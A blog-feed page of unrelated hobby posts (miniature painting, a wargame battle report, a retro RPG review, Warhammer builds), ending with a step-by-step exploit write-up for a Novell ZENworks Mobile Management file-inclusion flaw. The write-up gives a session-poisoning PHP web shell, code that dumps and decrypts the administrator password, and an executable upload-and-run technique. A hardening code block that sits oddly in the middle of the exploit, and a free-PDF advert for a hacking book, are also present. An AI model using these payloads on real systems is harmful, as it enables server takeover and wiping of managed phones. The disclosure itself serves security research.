Tuesday, September 22, 2020

Convergence Hobby Update - Speed Painting CoC


One of the theories I had about owning a Convergence of Cyriss army is that it would be very easy to paint quickly.

I am not a particularly skilled painter, though I truly enjoy it when I have a fully painted list on the table. I paint to a standard that I can look at the model from 3 feet away and be happy with it. Not what the crazy painter friends I have are happy with, but what I'm happy with being on the table. This is important as a standard because painting is about time and I don't particularly have a lot of it.

A large part of my enjoyment comes from the idea that once I have a faction fully painted, I can just put it on the table and play and not have to think "damn I need to get to painting this."

So the theory about painting CoC is that you can prime the models with a metallic spray paint, add in a few colors, apply a wash, and then be done.  Turns out this is actually true!






Since my last post about CoC spoke about how the bulk of the models I received were in really bad shape, and I highlighted how obnoxious the paint jobs were in addition to the fact that most everything was in pieces when it arrived, compare this to what the Monitor looked like before it was primed and painted:




That's quite a transformation! So how much effort was put into this from a painting perspective?


  • I based the model with sand/aquarium gravel.
  • I spray painted the model with some metallic spray paint, though I did test on the extra armless Axis model that was sent with my lot to make sure the primer wasn't going to be too thick. 
  • I spent roughly 2 hours or so applying the colors and washes to the primed model.
  • I also had to repaint the base and basing material black instead of silver, which was odd but worth it for how much time the whole process saved me.
I didn't get any fancy primer either, just some Rust-Oleum at Home Depot:


I should put a few notes, since it was slightly jarring with this as a primer.

The model will look almost comically silver when primed. In fact it was left slightly sticky, despite drying for nearly 24 hours after being primed. In fact before I started I was afraid the entire project was going to be a failure and I'd have to just prime everything black like I always do.

Luckily the washes came through for me in the end.  It's amazing what that did when combined with some gold and bronze paint on the model.  Everything turned out about as I'd have expected it in the end, and I'm at a point where I think I can really hammer out my CoC army probably well ahead of my Trolls.

As a point of painting comparison, I spent about two hours painting that Monitor. I spent about an hour and a half just touching up the base painting on my first Longrider unit, and I still have to finish painting the metals on it before I can apply my wash and then go back and hit a highlight to get the skin on the trolls the way I want it.

Perhaps it's because I'm pushing the Trolls to be painted to a much higher standard than what I think the CoC should be, but man does it just feel nice to be able to knock out a model and have it come out looking good enough for me to be happy with. For my Trolls I feel like I need to put in all this extra work to get it to a point where I'm happy. I suppose that's the difference between having models of something organic like a beast or an infantry with lots of exposed flesh vs. robots. Here's an example of what I paint my Trolls to:



Right now I have to admit it's almost tempting to just try and get the CoC going. I did get lucky and have my wife agree to let me play in our local Scrum League (think a Steamroller with 1 game a week), and lists are due Friday. I was very likely playing Trolls in it, though after last night I admit that I've had some thoughts about playing CoC instead. I have two days to decide!

Monday, September 21, 2020

The Battle Of Little Bluephoam River.

Since this was essentially a test of the revised board and the revived rules, I decided to just go with a straight encounter battle. Two forces vying for control of a bridge seemed as good a scenario as any, classic really.

The Rebel cavalry got to the bridge first and dismounted to hold it rather than rushing across in hope of winning a piecemeal battle with the Dominion cavalry.  An indecisive firefight between the opposing cavalry lasted until the infantry on both sides took their place.

As the infantry came up, Gen Douglas sent the Dominion cavalry to the right to cross the river. Gen Lannigan reacted quickly to send his cavalry to block them and ordered two "brigades" of infantry to cross over on his right.


It took a while for the armies to march on and deploy, (about 1/2 the game) but once they did, things quickly heated up.


A charge by the Gentlemen Pensioners in their shiny breastplates broke two squadrons of Rebel cavalry but not without losses and the Reb battery soon scattered the remnants of them. The Rebel infantry assault was broken up by terrain and ended  up going in piecemeal.


Each side rushed reinforcements into action and the fighting became heavy across the board.


Encouraged by the appearance of their Spirit Cat, the Rebel infantry poured across the river and closed with the enemy.


An attack by the Grenadiers on the farm was easily repulsed and things were looking dark for the Dominion forces.


The battle was not yet lost or won though and the Hochelaga Fusiliers renewed the assault.


The Dominion right flank had taken horrendous casualties but the men rallied and held their ground.  Finally the Blue wave halted and one flank began to give way.

As the sun sank towards the horizon, the Fusiliers drove their enemy from the farm and repulsed all counter attacks while the Grenadiers poured back over the river to reinforce the bridgehead. On the far flank, Rebel losses mounted and soon the whole army was on the edge of giving way. General Lannigan signalled a retreat. Best to save the army to fight again. The Dominion forces had a crossing but they were not going to get far tonight.

(In other words, at the end of 15 turns, Red had a secure foot hold on the other side of the river while Blue had a very insecure one and had also suffered more units lost and most of his units were only 1 hit away from breaking. The GM declared it a marginal win for Red.)








Saturday, September 12, 2020

A Close Race!

What's going on everyone!?


Today for the #2019gameaday challenge my dear ol' dad and I played a game of Ticket to Ride. 

It was a very close game and surprisingly I came away with the win somehow! 

As usual, it was a good game and he sure doesn't make it easy, lol.


As always, thank you for reading and don't forget to stop and smell the meeples! :)

-Tim

Game 378: Goodcode's Cavern (1982) And Romero/Carmack Corrections

            
Goodcode's Cavern
United States
Gebelli Software (publisher)
Released 1982 for Atari 800
Date Started: 3 September 2020
Date Ended: 3 September 2020
Total Hours: 2
Difficulty: Easy (2/5)
Final Rating: (to come later)
Ranking at time of posting: (to come later)
     
In today's edition of "If It Were Any Good, It Wouldn't Have Taken 10 Years to Show Up on MobyGames," we have Goodcode's Cavern, also known as Dr. Goodcode's Cavern (the box cover, title screen, and manual all slightly disagree). This all-text game plays like a combination of The Devil's Dungeon (1978), with its numbered rooms and magic wand as the only piece of player inventory, and Rodney Nelsen's Dragon Fire (1981), with its randomly-generated room descriptions. Its concepts are basic enough, however, that it might have been influenced by neither.
     
The setup is that Doctor Goodcode has purchased a mansion and found the caverns beneath it inhabited by monsters. He wants you, an adventurer, to clean it out. Thus begins your exploration of a randomly-generated three-level dungeon with 80 rooms per level. Your goal is to make it to the exit with as much treasure and as many kills as possible.
             
Stepping into the first room.
        
There's no character creation process. Everyone seems to start with a strength of 86 and no assets except a magic wand with three charges. The dungeon is laid out like a node map, with each room connecting to up to four others in the four cardinal directions. You can wind your way through all 80 rooms on each level in numerical order or watch for the occasional opportunity to jump from, say, Room 40 to Room 57. That's about the only "choice" you get in the game.
  
As you enter each room, the game draws from a collection of random terms and phrases, so one might be described as a "light blue room with a wooden floor" and the next a "ruby red room with a dirt floor." A selection of atmospheric effects finalizes the description: "There is a pool of blood"; "It smells like a fire"; "It is very musty in here." Each room can have nothing, some gold pieces strewn about, or an encounter with a monster.
          
This room is pink with a thick carpet and there's moaning.
           
Monsters include snakes, orcs, alligators, tigers, vampires, wild dogs, frogs, and cave bears. Each has a randomly-selected descriptor and color, so you might get a "mean white snake" or a "gruesome russet wild dog" or a "mammoth yellow vampire." Not only that, but there's a random exclamation before the monster ("Hot tacos!"; "Jiminy Cricket!") and each monster has a random behavioral descriptor after his name; for instance, "he is starting towards you" or "he is looking hungry." Each monster also has a strength level. Your only options are to "Defend" (which seems to do nothing), "Attack," or zap the creature with your magic wand. The latter kills everything instantly, but you only have three charges to start.
              
Hot tacos indeed. Although I suspect if I saw a blue grizzly bear, I'd start blaming something else I got in Mexico.
             
Attacking pits your strength against the monster level, and behind a bunch of colorful flashes, the game calculates how much health you and the monster lose. Some battles take up to three rounds. If you win, you get whatever treasure that monster was carrying, which again is drawn from a list of random descriptions and values. You might find an "ugly iron ring" worth nothing or a "bright gold chalice" worth 11,000 gold pieces. You only have 20 treasure slots, so you often find yourself discarding cheap treasures to make room for more expensive ones. There are no other inventory items in the game.
          
Finding a "nickel headband" and then checking my status.
        
As you defeat monsters, your level goes up, and I guess maybe it improves your odds in future combats. If so, it's not really palpable. Leveling is a bit weird, because it's expressed as two numbers, like "1-40" or "2-67." I couldn't tell where the first number rolls over; I think my winning character got to "2-110." Equally mysterious is how health regenerates. Your health is represented as a percentage--the higher the more you're wounded--and sometimes it seems to drop as you move between safe areas, but other times it remains stubbornly the same.
        
The mammoth russet vampire was a little too much for me, so I zapped him with the wand. I'm glad I did, because the colossal gold knife was worth a lot of money.
        
In addition to regular monsters, demons of various colors and descriptions (e.g., "yellow cave demon"; "pink sewer demon") pop up randomly and extort gold from you under a variety of excuses, including loans, protection money, and buying tickets to the "demon's ball." They ask for relatively little gold, and you can't fight them anyway, so there's nothing to do but hit B)ribe and pay them. Their demands don't even get more expensive on lower levels. It's a very weird dynamic.
          
A demon convinces me to pay reparations.
         
The game has an odd fixation with color. Not only do you get color descriptions for the rooms, monsters, and treasure, but the main screen frequently changes color, flashes different colors when combat is happening, and sticks different colored boxes randomly on the sides of the screen. I guess the developer was just showing off the capabilities of the system. It didn't affect my experience either way; I just found it strange.
    
If you die at any point, you can quickly hit the joystick button to resurrect in the same room for a minimal cost, but it fails about half the time.
              
No, but you can resurrect me.
         
Room 80 of the first two levels is a special room where a demon will buy your treasures for cash and then sell you food, a compass, information, or an extra two "zaps" for the wand. I have no idea what food does; buying it seemed to have no effect. Ditto the compass. "Information" resulted in nonsense clues (e.g., "you will meet a tall dark stranger") whenever I tried. The extra zaps are priceless, though, and you can make more than enough money on Level 1 to ensure that you can just use your wand to blast through the next two levels, although using the wand nets you no experience.
         
Room 80 on Level 1.
        
Room 80 on Level 3 presents you with a "wizened old man" seated at an organ. The door slams shut behind you, and your wand starts to flicker. This seems like an obvious clue to Z)ap the wand, but in fact it doesn't matter what action you take; the outcome is the same: you win the game and the program recaps the amount of treasure you collected and the number and strength of monsters you killed. Presumably, you're meant to keep replaying for higher scores.
    
The winning screens.
         
This is the sort of game that I would have seen in a bargain bin at Electronics Boutique in 1984. I would have been suspicious of its $7.95 price sticker, assuming it couldn't possibly deliver much content for that price, but I would have bought it with hope anyway, taken it home, and tried my best to supplement my wanderings with my own imagination, pretending I was having fun, but feeling in some vague way that there must be more to life than this.
           
Cavern barely passes as an RPG. It has one inventory item that you can choose to use; I guess it has some statistics behind the combat; and there is that mysterious "level." It gets only a 10 on the GIMLET, with 2s in economy, interface, and gameplay and 0s and 1s in everything else. I can't find the game even mentioned in a contemporary source, let alone reviewed.
         
I have no idea what's happening here.
                  
Dr. Goodcode, whoever he was, never made another appearance (search the name without Cavern and you get nothing). The rest of the title screen is equally mysterious. If the dedicatee, "Kitty Goodcode," wasn't a James Bond girl, she also wasn't anyone else as far as I can tell. Perhaps the only notable thing is that it was published by Gebelli Software, which was a short-lived California-based enterprise from Nasir Gebelli, the famed Apple II developer who went on to work on the Final Fantasy series at Square. I'm participating in a podcast with John Romero later in September, and I know he knows Gebelli, and I suppose I could ask him to ask Gebelli to confirm who Dr. Goodcode was, but . . . there are times that tracking down the original developers to some of these 1980s games honors them, and there are times that it doxxes them. This seems like one of the latter.
   
But since I was only able to get 1,200 words out of Goodcode's Cavern, let me use the rest of this space to explore a lesson that I recently learned about secondhand journalism. A few years ago, in writing about Dark Designs III: Retribution! (1991), I wrote the following:
            
1991 was a major transition year for Carmack and his new partner, John Romero. At the age of 20, Carmack had gotten a job two years prior at Softdisk, largely on the strength of his Dark Designs series. But he and the other developers grew to despise the sweatshop-like atmosphere of Softdisk and the monthly programming demands. He and Romero began moonlighting by selling their own games--principally the Commander Keen series--as shareware on bulletin board services. When Softdisk found out about these games, and that the pair had been using the company's computers to write them, both threats of a lawsuit and offers of a contract followed. The messy result was that Carmack and Romero left the company but agreed to continue to produce one game every 2 months for Softdisk's magazines. Thus, a couple years later, after the team had changed the gaming world forever with Wolfenstein 3D and DOOM, you see them credited on the occasional diskmag title like Cyberchess and Dangerous Dave Goes Nutz!
            
I had consulted several sources to assemble that paragraph, including one that purported to have interviewed both Carmack and Romero in detail, and I was pretty confident in what I had. Fast forward to a few weeks ago, when John Romero (who I didn't even know was aware of my blog) invited me to participate in a podcast interview of Stuart Smith. (We're recording in mid-September; I'll let you know when it's out.) I took the opportunity to run the paragraph by him and found out that almost everything I'd written was wrong. To wit:
          
  • I was a year late; 1990 was the year most of this happened. Romero worked at Softdisk prior to Carmack and was actually the one who hired Carmack, not because of Dark Designs but because of a tennis game plus his obvious facility with programming.
  • Romero and Carmack loved working at Softdisk and only left because it was the wrong sort of publisher to take advantage of the horizontal scrolling technology that the duo would use in Wolfenstein 3D and DOOM.
  • It was actually the president of Softdisk, Al Vekovius, who suggested that Carmack, Romero, and Tom Hall start their own company. There were no lawsuits and no threats; Carmack and Romero kept working for Softdisk for a year to avoid leaving the company in a lurch.
  • The reason Carmack and Romero are credited on so many Softdisk titles stretching into the mid-1990s is that those titles used technology and code that Carmack and Romero had created. They otherwise had no involvement in games like Cyberchess and Dangerous Dave Goes Nutz!
      
All of this has been a lesson in putting too much faith in secondary sources, even when they agree and everything seems to fit together logically. I didn't get into this gig to be a journalist, and I have no formal training in journalism, but clearly my blog has veered in that direction at least occasionally, and as such, I need to adopt stricter rules for my use of sources, to make it clear when I'm speculating based on limited evidence, and to always see primary sources when they're available. I'm still working on these "rules," but they stopped me here in speculating on the identity of Dr. Goodcode even though I have a pretty good idea of who he is.
     
Sorry for the otherwise short entry, but you'll see a few more of these in September, as I have to devote more time to getting my classes going. Hopefully for the next entry, I can make some progress on The Summoning.
    

Friday, September 4, 2020

DE: Powerful Builds For Your HQ

You know you're in some shit if someone points.

This one is going to be a short one since we're going to be primarily focused on the use of HQs.  One thing's for damn sure:  I feel that we have some fantastic melee HQ options for the price.

Here are some of my favorites so far:
  • Archon, Labyrinthine Cunning, Writ of the Living Muse = 72 base
  • Archon, Hatred Eternal, Djin Blade = 76 base
  • Archon, Famed Savagery, Djin Blade = 76 base
  • Succubus, Blood Dancer, Adrenalight, Triptych Whip = 54 base
  • Succubus, Hyper-swift Reflexes, Adrenalight, Blood Glaive = 54 base
  • Succubus, Precision Blows, Adrenalight, Triptych Whip = 54 base
  • Haemonculus, Diabolical Soothsayer, Vexator Mask = 75 base

Let's start with the Archons.  You've all probably seen me take the Archon with Cunning and Writ of the Living Muse in my lists.  That's because it's one of the most powerful Warlords in the game for the points IMO.  Cunning is absolutely fantastic at regenerating CPs whenever a CP is spent for both you and your opponents.  For DE, I find that some of our Stratagems are a little costly, especially that Agents of Vect counterspell that costs 3 just by itself.  With Cunning, you can do some really crazy recycling that can help you sustain the longer gameplan:

For example:
  • You don't want a 2-cost Stratagem to go off so you throw out Agents of Vect.
  • Before you even put AoV down, you roll 2 dice for his Stratagem for Cunning.
  • Next, you AoV and since you just spent 3 CP, you roll 3 more dice to see if you get any back from Cunning.
  • Agents of Vect then takes effect, hopefully blocking his Stratagem.
  • In this example right here, you're probably going to get back a CP from just playing the game regularly.

When you play Black Heart, you almost have to bring Writ of the Living Muse.  It's one of the best buff batteries in the entire game and enhances the damage potential of every single Black Heart unit within 6".  Everything within this distance gets re-roll 1s to Hit and Wound, and that is a huge damage amplifier, especially on things like Dark Lances and Disintegrators when you absolutely need to hit with your more expensive damaging weapons.  Living Muse simply gives you consistent damage and that's exactly what you need to turn your very good shooting up a notch to exceptional.

As for melee Archons, I see two main options here:  Both of which have the Djin Blade of course which is just an upscaled Huskblade.  Hatred Eternal gives you more consistent results via re-roll all wounds in melee but the Famed Savagery Archon from Flayed Skull gives you great burst damage.  With Famed Savagery, you have 8 S5 AP-3 D3 attacks that hit on 2s with re-roll 1s.  Personally, if I was to pick one of the two, I would go for more consistent damage with the Hatred Eternal Warlord trait.  There are bonus points in the fact that Hatred Eternal is a generic WL trait and thus doesn't lock you to any particular Obsession.  As for arming the Archons further, always seek out the Blaster first since you have a fantastic BS2+ and Blasters are amazing with their S8 AP-4 D6 damage from 18" (24" for Obsidian Rose).

I whip my hair back and forth.

The Succubus went from one of the most overcosted units in the entire game to arguably the most cost-efficient melee blender in the game.  I'll start off by listing the Blood Dancer variant that comes with 9 attacks hitting on 2s, re-rolling 1s, and each Hit roll of a 6 turns into 3 Hits instead of 1.  On the regular, she can throw out something like 14 attacks with an Agonizer (Poison 4+ AP-2 1D) and that's just obscene.  Against single wound models, she is almost guaranteed to wipe out entire squads by herself.  She just reminds me of the Blenderlord that I ran for Vampire Counts back in the days of Fantasy.  To make things even more exciting, once you hit Turn 3+, you can activate these multiple hits on a 5+ instead of 6 because of the PFP chart.  The only downside here is that she's a Succubus and she just explodes if anyone swings back at her because she only has a 4++/6+++ with T3 and 5 wounds.  Regardless, LOOK at her points cost!  For 54 points, she's an absolute steal.  I can't help but hear this garbage ass song whenever she enters combat.

Other variants of the Succubus are also really strong; such as the Blood Glaive Succubus with 5 attacks with Adrenalight dealing S6 AP-3 D3 damage attacks.  I've seen this particular variant built two ways really; with either the Red Grief specific WL trait of 3++ or with Stimm Addict with Grave Lotus and Adrenalight.  This gives her 5 attacks at S7 which is now a serious threat to virtually all targets including light vehicles.  Again, 54 points of awesome.

Another variant I want to introduce you to is someone who might be our best duelist.  She has 9 attacks with the Whip just like the Blender because she's from Cult of Strife (for +1 attack), however instead of Blood Dancer, she has the Precision Blows WL trait.  When you're hitting with 8-9 attacks every turn, you're going to be looking for 6s that can just do straight mortal wounds in addition to the regular wounds inflicted with an Agonizer.  That's very good.  For all these Succubus, I highly recommend taking a Blast Pistol on the Blood Glaive Succy to take advantage of her superior BS2+.  Funny enough, the Precision Blows Succubus can still do mortal wounds to Vehicles and Titans.

Never trust someone with 5-6, 7? arms.

Lastly, we have the Haemonculus that you will probably see most frequently if you're planning to take Coven units and Alliance of Agony for 1 CP.  This is because Diabolical Soothsayer essentially pays for itself immediately and you can get 2 more CP if you roll well (D3 in total).  Sure, you also get that once a game re-roll for your Warlord, but no one really cares about that because you also gain access to the Vexator Mask.  This thing is actually pretty hilarious.  You can basically take this Haemonculus and just charge into something to tie it up because they cannot use Overwatch on you.  You can then charge your Wyches into them for free without any fear of OW fire.  To make things even more enjoyable, the mask also gives an enemy unit within 6" of the Haemonculus ASL essentially, making them strike last after all other units have gone in the Fight phase.  That's just funny considering the amount of melee boss HQs we have in the Codex.

What are some of your favorite HQs to bring?  I know I've been extra boring with the Black Heart Archon, but hey, it's been working so why not!

Monday, August 31, 2020

Novell Zenworks MDM: Mobile Device Management For The Masses

I'm pretty sure the reason Novell titled their Mobile Device Management (MDM, yo) under the 'Zenworks' group is because the developers of the product HAD to be in a state of meditation (sleeping) when they were writing the code you will see below.


For some reason the other night I ended up on the Vupen website and saw the following advisory on their page:
Novell ZENworks Mobile Management LFI Remote Code Execution (CVE-2013-1081) [BA+Code]
I took a quick look around and didn't see a public exploit anywhere so after discovering that Novell provides 60 day demos of products, I took a shot at figuring out the bug.
The actual CVE details are as follows:
"Directory traversal vulnerability in MDM.php in Novell ZENworks Mobile Management (ZMM) 2.6.1 and 2.7.0 allows remote attackers to include and execute arbitrary local files via the language parameter."
After setting up a VM (Zenworks MDM 2.6.0) and getting the product installed it looked pretty obvious right away (1 request?) where the bug may exist:
POST /DUSAP.php HTTP/1.1
Host: 192.168.20.133
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.20.133/index.php
Cookie: PHPSESSID=3v5ldq72nvdhsekb2f7gf31p84
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 74

username=&password=&domain=&language=res%2Flanguages%2FEnglish.php&submit=
Pulling up the source for the "DUSAP.php" script the following code path stuck out pretty bad:
<?php
session_start();

$UserName = $_REQUEST['username'];
$Domain = $_REQUEST['domain'];
$Password = $_REQUEST['password'];
$Language = $_REQUEST['language'];
$DeviceID = '';

if ($Language !== ''  &&  $Language != $_SESSION["language"])
{
     //check for validity
     if ((substr($Language, 0, 14) == 'res\\languages\\' || substr($Language, 0, 14) == 'res/languages/') && file_exists($Language))
     {
          $_SESSION["language"] = $Language;
     }
}

if (isset($_SESSION["language"]))
{
     require_once( $_SESSION["language"]);
} else
{
     require_once( 'res\languages\English.php' );
}

$_SESSION['$DeviceSAKey'] = mdm_AuthenticateUser($UserName, $Domain, $Password, $DeviceID);
In English:

  • Check if the "language" parameter is passed in on the request
  • If the "Language" variable is not empty and if the "language" session value is different from what has been provided, check its value
  • The "validation" routine checks that the "Language" variable starts with "res\languages\" or "res/languages/" and then if the file actually exists in the system
  • If the user has provided a value that meets the above criteria, the session variable "language" is set to the user provided value
  • If the session variable "language" is set, include it into the page
  • Authenticate

So it is possible to include any file from the system as long as the provided path starts with "res/languages" and the file exists. To start off it looked like maybe the IIS log files could be a possible candidate to include, but they are not readable by the user everything is executing under…bummer. The next spot I started looking for was if there was any other session data that could be controlled to include PHP. Example session file at this point looks like this:
$error|s:12:"Login Failed";language|s:25:"res/languages/English.php";$DeviceSAKey|i:0;
The "$error" value is server controlled, the "language" has to be a valid file on the system (can't stuff PHP in it), and "$DeviceSAKey" appears to be related to authentication. Next step I started searching through the code for spots where the "$_SESSION" is manipulated hoping to find some session variables that get set outside of logging in. I ran the following to get a better idea of places to start looking:
egrep -R '\$_SESSION\[.*\] =' ./
This pulled up a ton of results, including the following:
/desktop/download.php:$_SESSION['user_agent'] = $_SERVER['HTTP_USER_AGENT'];
Taking a look at the "download.php" file the following was observed:

<?php
session_start();
if (isset($_SESSION["language"]))
{
     require_once( $_SESSION["language"]);
} else
{
     require_once( 'res\languages\English.php' );
}
$filedata = $_SESSION['filedata'];
$filename = $_SESSION['filename'];
$usersakey = $_SESSION['UserSAKey'];

$_SESSION['user_agent'] = $_SERVER['HTTP_USER_AGENT'];
$active_user_agent = strtolower($_SESSION['user_agent']);

$ext = substr(strrchr($filename, '.'), 1);

if (isset($_SESSION['$DeviceSAKey']) && $_SESSION['$DeviceSAKey']  > 0)
{

} else
{
     $_SESSION['$error'] = LOGIN_FAILED_TEXT;
     header('Location: index.php');

}
The first highlighted part sets a new session variable "user_agent" to whatever our browser is sending, good so far.... The next highlighted section checks our session for "DeviceSAKey" which is used to check that the requester is authenticated in the system, in this case we are not so this fails and we are redirected to the login page ("index.php"). Because the server stores our session value before checking authentication (whoops) we can use this to store our payload to be included :)
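As an added example (not Novell's code and not the post's exploit), here is how the two weak spots discussed above can be hardened in PHP: the language include is driven by an allowlist of language names instead of a prefix check on a caller-supplied path, and the session write in download.php is moved behind the authentication check. It assumes the res/languages/<Name>.php layout from the post and a constructed allowlist of shipped language packs.

```php
<?php
// Added example, not Novell's code and not the post's exploit. It hardens the two
// spots discussed above: the prefix-checked language include in DUSAP.php and the
// session write that download.php performs before checking authentication.
// Assumptions: language packs live in res/languages/<Name>.php under this script's
// directory, and the shipped packs are the ones listed in ALLOWED_LANGUAGES.
declare(strict_types=1);

const LANGUAGE_DIR = __DIR__ . '/res/languages';
const ALLOWED_LANGUAGES = ['English', 'French', 'German']; // constructed allowlist

// The original check, reproduced for comparison. A constructed value such as
// "res/languages/../../php/temp/sess_x" satisfies the prefix test, and
// file_exists() follows the ".." segments, so the test says nothing about
// where the file actually lives.
function original_language_check(string $language): bool
{
    return (substr($language, 0, 14) == 'res\\languages\\' || substr($language, 0, 14) == 'res/languages/')
        && file_exists($language);
}

// Hardened replacement: the request may name a language, never a path.
// Returns the absolute file to include, or null when the request is rejected.
function resolve_language_file(string $language): ?string
{
    // Accept the legacy "res/languages/English.php" form by reducing it to a
    // bare name; every other part of the string is discarded, not trusted.
    $name = basename(str_replace('\\', '/', $language), '.php');

    // Allowlist of known packs, compared strictly: "sess_x" or "" never match.
    if (!in_array($name, ALLOWED_LANGUAGES, true)) {
        return null;
    }

    // Build the path ourselves and confirm it resolves inside LANGUAGE_DIR.
    // realpath() collapses ".." and symlinks, so the containment test is made
    // on the real location rather than on how the caller spelled it.
    $base = realpath(LANGUAGE_DIR);
    $path = realpath(LANGUAGE_DIR . '/' . $name . '.php');
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// download.php wrote $_SESSION['user_agent'] before looking at $DeviceSAKey,
// which is what let an unauthenticated request place data in a session file.
// Check first, stop on failure, and only then touch the session.
function require_authenticated(): void
{
    if (!isset($_SESSION['$DeviceSAKey']) || $_SESSION['$DeviceSAKey'] <= 0) {
        $_SESSION['$error'] = 'Login Failed';
        header('Location: index.php');
        exit; // without exit the rest of the script still runs after the redirect
    }
}

session_start();
$requested = (string) ($_REQUEST['language'] ?? '');
$file = resolve_language_file($requested);
if ($file === null) {
    $file = LANGUAGE_DIR . '/English.php'; // fixed default, never the raw input
}
require_once $file;

require_authenticated();
// Only now is it acceptable to record per-request data in the session.
$_SESSION['user_agent'] = $_SERVER['HTTP_USER_AGENT'] ?? '';
```

Because the include path is assembled from an allowlisted name and confirmed with realpath(), a session file or any other file outside res/languages can no longer be reached through the language parameter, and nothing is stored in the session for a request that has not authenticated.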


This will create a session file named "sess_payload" that we can include, the file contains the following:
user_agent|s:34:"<?php echo(eval($_GET['cmd'])); ?>";$error|s:12:"Login Failed";
Now, I'm sure if you are paying attention you'd say "wait, why don't you just use exec/passthru/system", well the application installs and configures IIS to use a "guest" account for executing everything – no execute permissions for system stuff (cmd.exe,etc) :(. It is possible to get around this and gain system execution, but I decided to first see what other options are available. Looking at the database, the administrator credentials are "encrypted", but I kept seeing a function being used in PHP when trying to figure out how they were "encrypted": mdm_DecryptData(). No password or anything is provided when calling the function, so it can be assumed it is magic:
return mdm_DecryptData($result[0]['Password']); 
It turns out it is magic, so I sent the following PHP to be executed on the server:
$pass=mdm_ExecuteSQLQuery("SELECT Password FROM Administrators where AdministratorSAKey = 1",array(),false,-1,"","","",QUERY_TYPE_SELECT);
echo $pass[0]["UserName"].":".mdm_DecryptData($pass[0]["Password"]);
 


Now that the password is available, you can log into the admin panel and do wonderful things like deploy policy to mobile devices (CA + proxy settings :)), wipe devices, pull text messages, etc.

This functionality has been wrapped up into a Metasploit module that is available on GitHub:

Next up is bypassing the fact that we cannot use "exec/system/passthru/etc." to run system commands. The issue is that all of these functions execute whatever they are given via the system "shell", in this case "cmd.exe", which we do not have rights to execute. Lucky for us, PHP provides "proc_open", and specifically "proc_open" allows us to set the "bypass_shell" option. Knowing this, we need to figure out how to get an executable onto the server and where we can put it. The where part is easy: the PHP process user has to be able to write to the PHP "temp" directory in order to write session files, so that is the obvious choice. There are plenty of ways to get a file onto the server using PHP, but I chose to use "php://input" with the executable base64'd in the POST body:
// path is relative to the current directory, so it works regardless of install location
$wdir=getcwd()."\..\..\php\\temp\\";
file_put_contents($wdir."cmd.exe",base64_decode(file_get_contents("php://input")));
This bit of PHP will read the HTTP POST body (php://input), base64-decode its contents, and write it to a file in the location we have specified. This location is relative to where we are executing, so it should work no matter what directory the product is installed to.


After we have uploaded the file we can then carry out another request to execute what has been uploaded:
$wdir=getcwd()."\..\..\php\\temp\\";
$cmd=$wdir."cmd.exe";
$output=array();
// bypass_shell: run the uploaded file directly instead of via the system shell
$handle=proc_open($cmd,array(1=>array("pipe","w")),$pipes,null,null,array("bypass_shell"=>true));
if(is_resource($handle))
{
     $output=explode("\n",stream_get_contents($pipes[1]));
     fclose($pipes[1]);
     proc_close($handle);
}
foreach($output as &$temp){echo $temp."\r\n";}
The key here is the "bypass_shell" option that is passed to "proc_open". Since all files that are created by the process user in the PHP "temp" directory are created with "all of the things" permissions, we can point "proc_open" at the file we have uploaded and it will run :)

This process was then rolled up into a Metasploit module which is available here:


Update: The modules are now available as part of Metasploit.


Sunday, August 30, 2020

Advanced Penetration Testing • Hacking The World'S Most Secure Networks Free PDF